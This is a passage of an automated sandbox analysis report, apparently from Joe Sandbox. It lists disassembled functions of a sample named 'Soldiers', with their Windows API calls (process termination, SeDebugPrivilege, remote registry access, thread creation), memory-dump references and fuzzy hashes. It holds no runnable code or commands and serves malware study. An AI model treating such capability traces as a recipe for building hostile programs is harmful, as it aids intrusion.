                                                          • DuplicateHandle.KERNEL32(00000000,?,0093915A,00000B00,?,?), ref: 00939509
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0093915A,00000B00,?,?), ref: 00939519
                                                          • GetCurrentProcess.KERNEL32(0093915A,00000000,?,0093915A,00000B00,?,?), ref: 00939521
                                                          • DuplicateHandle.KERNEL32(00000000,?,0093915A,00000B00,?,?), ref: 00939524
                                                          • CreateThread.KERNEL32(00000000,00000000,0093954A,00000000,00000000,00000000), ref: 0093953E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: bc142ba801781952a6a3ce241301f9339ac69e4286fb40522327269d487528da
                                                          • Instruction ID: f4475eae249ad91e691a440202d85e3072a4f0e78d2cfec06c2c28bcf6aa06c4
                                                          • Opcode Fuzzy Hash: bc142ba801781952a6a3ce241301f9339ac69e4286fb40522327269d487528da
                                                          • Instruction Fuzzy Hash: 2E01BBB6658304FFE710ABA5DC4DF6B7BACEBC9711F404411FA09DB1A1CAB09840DB20
                                                          Function 0095A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: c90e27d38585b0bbdb8ff6aca45683670a03564d8f6befecdf76cd746ae37875
                                                          • Instruction ID: 699ad5912659a028248668ed410d9a7dd89425ddb21e31bbb09eb72248571a3f
                                                          • Opcode Fuzzy Hash: c90e27d38585b0bbdb8ff6aca45683670a03564d8f6befecdf76cd746ae37875
                                                          • Instruction Fuzzy Hash: 5EC1A171A0021A9FDF10CF99C885FAEB7B9FB88315F148529FD05AB280E7709D49CB55
                                                          Function 009597FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2102423945-625585964
                                                          • Opcode ID: 324e16c58d814d268cbd3f97bbb376fb04de872983077e4d6ffab9a38bf80fe1
                                                          • Instruction ID: d8eaf7c84b603c77f89e11af5a0d284972f5435e20cf2433b3b4c74e15879f0f
                                                          • Opcode Fuzzy Hash: 324e16c58d814d268cbd3f97bbb376fb04de872983077e4d6ffab9a38bf80fe1
                                                          • Instruction Fuzzy Hash: 34919F31A00219EBEF24CFA6C854FAEB7B8EF85711F10855DF915AB280D7749948CFA0
                                                          Function 00959E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00937D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?,?,00938073), ref: 00937D45
                                                            • Part of subcall function 00937D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?), ref: 00937D60
                                                            • Part of subcall function 00937D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?,?), ref: 00937D6E
                                                            • Part of subcall function 00937D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937C62,80070057,?), ref: 00937D7E
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00959EF0
                                                          • _memset.LIBCMT ref: 00959EFD
                                                          • _memset.LIBCMT ref: 0095A040
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0095A06C
                                                          • CoTaskMemFree.OLE32(?), ref: 0095A077
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 0095A0C5
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: f1e5ca361495cb0d61fc84ae6a0596a964a736f6054eea47456719c9f43e3d68
                                                          • Instruction ID: 297f7480c11d4b2265d1c5eba774a82cc27404bcec8bf2d381d31e5f15112b73
                                                          • Opcode Fuzzy Hash: f1e5ca361495cb0d61fc84ae6a0596a964a736f6054eea47456719c9f43e3d68
                                                          • Instruction Fuzzy Hash: A9913671D0022CEBDB10DFA5D844AEEBBB9FF49310F10811AF919A7281DB719A44CFA1
                                                          Function 009673A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010,?,?,SysListView32,00970980,00000000,?,?,?,?,?,?,00000000), ref: 00967449
                                                          • SendMessageW.USER32(?,00001036,00000000,?,?,?,SysListView32,00970980,00000000,?,?,?,?,?,?,00000000), ref: 0096745D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00967477
                                                          • _wcscat.LIBCMT ref: 009674D2
                                                          • SendMessageW.USER32(?,00001057,00000000,?,?,?,009A77C4), ref: 009674E9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00967517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: b8dfb12385844fb7c22364d3ec3b533a5581418a8ba9616ac5d6709ae7ad9e75
                                                          • Instruction ID: 2ebc489e7f66f975cdaefc7054d87b2741d6f2ce9820c682bf4605b184d2c838
                                                          • Opcode Fuzzy Hash: b8dfb12385844fb7c22364d3ec3b533a5581418a8ba9616ac5d6709ae7ad9e75
                                                          • Instruction Fuzzy Hash: CE41D471604308AFDB219FA4CC89FEEB7A9EF48354F10446AF945E72D1D6719D84CB60
                                                          Function 0095F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00944148: CreateToolhelp32Snapshot.KERNEL32 ref: 0094416D
                                                            • Part of subcall function 00944148: Process32FirstW.KERNEL32(00000000,?), ref: 0094417B
                                                            • Part of subcall function 00944148: CloseHandle.KERNEL32(00000000), ref: 00944245
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095F08D
                                                          • GetLastError.KERNEL32 ref: 0095F0A0
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095F0CF
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0095F14C
                                                          • GetLastError.KERNEL32(00000000), ref: 0095F157
                                                          • CloseHandle.KERNEL32(00000000), ref: 0095F18C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: d19f082d6c0fdd63071bc69a1a0bbaf2b6fdb27631823879d2d9ab82e2f5acee
                                                          • Instruction ID: ec8433b5a7d9e609ea2e7c612617c024e15abf89ee3cbaf33184346732c07c2d
                                                          • Opcode Fuzzy Hash: d19f082d6c0fdd63071bc69a1a0bbaf2b6fdb27631823879d2d9ab82e2f5acee
                                                          • Instruction Fuzzy Hash: EF41D171308201DFDB21EF69CCA5F6DB7A5EF84724F048418F9468B2D2CB74A848CB96
                                                          Function 008F56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104,009A7A2C,009A7890), ref: 00930C5B
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • _memset.LIBCMT ref: 008F5787
                                                          • _wcscpy.LIBCMT ref: 008F57DB
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 008F57EB
                                                          • __swprintf.LIBCMT ref: 00930CD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                          • String ID: Line %d: $AutoIt -
                                                          • API String ID: 230667853-4094128768
                                                          • Opcode ID: e8ed81eaafd5f3ee1d2eb91179fd5358aa77ced5466ca544f9ae807d91d40679
                                                          • Instruction ID: 85d23febc2ee951e299542881cb87cbce53f33c47a3c5803a996d7204f01eb96
                                                          • Opcode Fuzzy Hash: e8ed81eaafd5f3ee1d2eb91179fd5358aa77ced5466ca544f9ae807d91d40679
                                                          • Instruction Fuzzy Hash: FE419271108308AAC721EB74DC46BEBB7DCEF85354F00461AF695D20A1EB70A648CB93
                                                          Function 009434DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03,009A7A2C,009A7890,009A7A30,009A7890,009A7890,?,00930D1F,?,?,009A7A30), ref: 0094357C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 5b7da7c54fea219e0522df8c2062eb4aa16ed61edef8ce0d51901b7a2e7b9396
                                                          • Instruction ID: a42e4b7516b2dd1e13466487b6799fb9c67b5fa7c4fcf2314accbbe88a663b01
                                                          • Opcode Fuzzy Hash: 5b7da7c54fea219e0522df8c2062eb4aa16ed61edef8ce0d51901b7a2e7b9396
                                                          • Instruction Fuzzy Hash: 9F115C3160C306BEEB146B35FC92D6A779CDF59368F20802EFA18A61C1E7786F4056A0
                                                          Function 009447E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00944802
                                                          • LoadStringW.USER32(00000000), ref: 00944809
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094481F
                                                          • LoadStringW.USER32(00000000), ref: 00944826
                                                          • _wprintf.LIBCMT ref: 0094484C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094486A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00944847
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: b0e356abc17b94fb710f04571bdb0328d5efc38a6145c45b8a9a260c67e10627
                                                          • Instruction ID: d859b9f77b39918c267c1a2a033761626480594ff15edc642c40b6620331b816
                                                          • Opcode Fuzzy Hash: b0e356abc17b94fb710f04571bdb0328d5efc38a6145c45b8a9a260c67e10627
                                                          • Instruction Fuzzy Hash: FB014FF3904208BFE75197A49D89EF6736CE748300F4005A5B74DE2141EA749E944B75
                                                          Function 0096DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0096DB42
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0096DB62
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0096DD9D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0096DDBB
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0096DDDC
                                                          • ShowWindow.USER32(00000003,00000000), ref: 0096DDFB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0096DE20
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0096DE43
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 4ac2dfd0a90cc8b9c3f1f391ca4bf53e2ff21a8fce7f7d65c418ae8c7e27c13e
                                                          • Instruction ID: 95933970da4d695f3c59119bdd443710e98ee330e902bec0c0f7fdca83c19987
                                                          • Opcode Fuzzy Hash: 4ac2dfd0a90cc8b9c3f1f391ca4bf53e2ff21a8fce7f7d65c418ae8c7e27c13e
                                                          • Instruction Fuzzy Hash: E6B1AA31A01219EFDF14CF69C9C5BAD7BB5FF44701F088069EC689E295D735A990CBA0
                                                          Function 00960371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0096147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096040D,?,?), ref: 00961491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096044E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3479070676-0
                                                          • Opcode ID: 845e3a6492c804473d27202190be83eae4e493ca49f90a4ac5e88f04af606ebf
                                                          • Instruction ID: 68907e5626c1e1c0515bc96d3bae635141bde91dac179b85206712b166635db6
                                                          • Opcode Fuzzy Hash: 845e3a6492c804473d27202190be83eae4e493ca49f90a4ac5e88f04af606ebf
                                                          • Instruction Fuzzy Hash: F3A15571208205DFCB11EF68C885B2EB7E5FF84314F14891DF99A8B2A2DB35E945CB42
                                                          Function 008E2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(?,?,00000000,00000000,?,0091C508,00000004,00000000,00000000,00000000), ref: 008E2E9F
                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,?,0091C508,00000004,00000000,00000000,00000000,000000FF), ref: 008E2EE7
                                                          • ShowWindow.USER32(?,00000006,00000000,00000000,?,0091C508,00000004,00000000,00000000,00000000), ref: 0091C55B
                                                          • ShowWindow.USER32(?,?,00000000,00000000,?,0091C508,00000004,00000000,00000000,00000000), ref: 0091C5C7
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 5589037874193b3736254d5fdee47e84c3f59d480f20dd262860a1c1b9d3cb2c
                                                          • Instruction ID: 2d2844dba2e596b4c5eee412b68add76768ab6f16c5212206d8d129a08464a76
                                                          • Opcode Fuzzy Hash: 5589037874193b3736254d5fdee47e84c3f59d480f20dd262860a1c1b9d3cb2c
                                                          • Instruction Fuzzy Hash: 5641D67171C6DAAAD7399B2A8C8876A7B9AFBC3304F24440DF447C6562C775B8C0E711
                                                          Function 00947681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00947698
                                                            • Part of subcall function 00900FE6: std::exception::exception.LIBCMT ref: 0090101C
                                                            • Part of subcall function 00900FE6: __CxxThrowException@8.LIBCMT ref: 00901031
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009476CF
                                                          • EnterCriticalSection.KERNEL32(?), ref: 009476EB
                                                          • _memmove.LIBCMT ref: 00947739
                                                          • _memmove.LIBCMT ref: 00947756
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00947765
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0094777A
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00947799
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: d178bf7b5a0fbd992dbb02f3a01843364351e330c6343fa2d7574966d2fb2c1c
                                                          • Instruction ID: fad0bd6aae07464887b1a9db75ea2262c69fc1ec85ab01551a269255107ef76c
                                                          • Opcode Fuzzy Hash: d178bf7b5a0fbd992dbb02f3a01843364351e330c6343fa2d7574966d2fb2c1c
                                                          • Instruction Fuzzy Hash: 02315072918209EFDB10EFA4DC85E6EBB78EF85310B1440A5F904EA296D7309E54DBA0
                                                          Function 009667F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32(00000000,00000001,?,?,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00966810
                                                          • GetDC.USER32(00000000,00000001,?,?,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00966818
                                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00966823
                                                          • ReleaseDC.USER32(00000000,00000000,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0096682F
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0096686B
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0096687C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?), ref: 009668B6
